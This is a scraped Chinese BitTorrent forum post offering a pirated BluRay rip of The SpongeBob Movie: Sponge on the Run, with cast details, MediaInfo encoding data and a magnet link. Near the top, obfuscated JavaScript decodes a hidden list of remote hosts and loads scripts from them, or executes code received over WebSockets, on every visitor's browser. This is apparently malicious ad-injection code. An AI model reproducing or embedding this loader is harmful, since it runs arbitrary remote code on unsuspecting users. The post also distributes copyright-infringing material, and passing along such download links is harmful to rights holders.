海绵宝宝:营救大冒险[简繁字幕]The.SpongeBob.Movie.Sponge.on.the.Run.2020.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-迅雷下载 7.83GB

版主小s 19天前 152

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 海绵宝宝:营救大冒险 / 海绵宝宝3 / 海绵宝宝:奔跑吧(台) / 海绵宝宝:急急脚走佬(港) / SpongeBob Squarepants 3 / Spongebob Movie 3 / It's a Wonderful Sponge

◎片 名 The SpongeBob Movie: Sponge on the Run

◎年 代 2020

◎产 地 美国 / 韩国 / 墨西哥 / 日本 / 西班牙

◎类 别 喜剧 / 动画 / 冒险

◎语 言 英语 / 西班牙语 / 阿拉伯语

◎上映日期 2020-11-06(中国大陆网络) / 2020-08-14(加拿大)

◎IMDb链接 https://www.imdb.com/title/tt4823776/

◎豆瓣评分 6.2/10 (8802人评价)

◎豆瓣链接 https://movie.douban.com/subject/26662159/

◎片 长 91分钟

◎导 演 蒂姆·希尔 Tim Hill (id:1320343)

◎编 剧 蒂姆·希尔 Tim Hill (id:1320343)

乔纳森·阿贝尔 Jonathan Aibel (id:1023289)

格伦·伯杰 Glenn Berger (id:1050755)

史蒂芬·海伦伯格 Stephen Hillenburg (id:1025052)

保罗·提比特 Paul Tibbitt (id:1347754)

◎演 员 基努·里维斯 Keanu Reeves (id:1008070)

奥卡菲娜 Awkwafina (id:1360857)

克兰西·布朗 Clancy Brown (id:1013817)

汤姆·肯尼 Tom Kenny (id:1113456)

比尔·法格巴克 Bill Fagerbakke (id:1080079)

罗里·艾伦 Lori Alan (id:1057987)

劳伦斯先生 Mr. Lawrence (id:1347753)

玛丽·乔·卡特利特 Mary Jo Catlett (id:1069059)

罗德格尔·邦帕斯 Rodger Bumpass (id:1069989)

吉尔·塔利 Jill Talley (id:1154164)

卡罗琳·劳伦斯 Carolyn Lawrence (id:1110253)

维罗妮卡·阿利奇诺 Veronica Alicino (id:1056960)

汉斯·季默 Hans Zimmer (id:1054386)

Nick Kenway Nick Kenway (id:1431554)

Ineke Majoor Ineke Majoor (id:1431543)

◎标 签 海绵宝宝 / 动画 / 喜剧 / 美国 / 2020 / 3D / 派拉蒙 / Nickelodeon

◎简 介

《海绵宝宝:营救大冒险》讲述了海绵宝宝心爱的宠物小蜗被绑架后,海绵宝宝和派大星前往失落的大西洋城展开营救冒险的故事。在这场充满危险又妙趣横生的营救行动中,海绵宝宝和他的朋友们用实际行动证明了友谊的力量无限大!

◎获奖情况 (共1项)

第19届美国视觉效果协会奖 (2021)

最佳动画电影CG动画角色(提名)

  1. General

  2. Unique ID : 145214353466336175049151868804267210760 (0x6D3F4465397FD5BDFEA5F7B58C537808)

  3. Complete name : The.SpongeBob.Movie.Sp[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.83 GiB

  7. Duration : 1 h 31 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 12.2 Mb/s

  10. Encoded date : UTC 2021-07-15 03:07:46

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 31 min

  20. Bit rate : 8 387 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 038 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.176

  30. Stream size : 5.36 GiB (68%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 8386 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1038 / interlace=0 / total-frames=131652 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 31 min

  48. Bit rate mode : Variable

  49. Bit rate : 3 660 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 2.34 GiB (30%)

  57. Title : English DTS-HD Master Audio 5.1 @ 3660 kbs

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Text #1

  62. ID : 3

  63. Format : PGS

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 22 min

  67. Bit rate : 41.8 kb/s

  68. Count of elements : 2598

  69. Stream size : 24.5 MiB (0%)

  70. Title : Eng/SUP

  71. Language : English

  72. Default : No

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 29 min

  80. Bit rate : 48.0 kb/s

  81. Count of elements : 3318

  82. Stream size : 30.8 MiB (0%)

  83. Title : Eng/SUP SDH

  84. Language : English

  85. Default : No

  86. Forced : No


  87. Text #3

  88. ID : 5

  89. Format : PGS

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 22 min

  93. Bit rate : 61.8 kb/s

  94. Count of elements : 2738

  95. Stream size : 36.5 MiB (0%)

  96. Title : Chs/SUP 简英双语

  97. Language : Chinese

  98. Default : Yes

  99. Forced : No


  100. Text #4

  101. ID : 6

  102. Format : PGS

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 1 h 22 min

  106. Bit rate : 63.5 kb/s

  107. Count of elements : 2738

  108. Stream size : 37.5 MiB (0%)

  109. Title : Cht/SUP 繁英双语

  110. Language : Chinese

  111. Default : No

  112. Forced : No


  113. Menu

  114. 00:00:00.000 : en:第 01 章

  115. 00:05:09.351 : en:第 02 章

  116. 00:11:36.112 : en:第 03 章

  117. 00:15:04.529 : en:第 04 章

  118. 00:20:24.932 : en:第 05 章

  119. 00:24:46.443 : en:第 06 章

  120. 00:31:37.062 : en:第 07 章

  121. 00:39:54.976 : en:第 08 章

  122. 00:44:42.513 : en:第 09 章

  123. 00:52:46.830 : en:第 10 章

  124. 00:57:14.389 : en:第 11 章

  125. 01:05:13.076 : en:第 12 章

  126. 01:12:37.228 : en:第 13 章

  127. 01:21:06.361 : en:第 14 章

  128. 01:22:49.673 : en:第 15 章


TAGS 冒险 动画 喜剧

磁力链:
  • magnet:?xt=urn:btih:B2051688A5ECDAF6D9A3A89F0D521814BDE50615
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回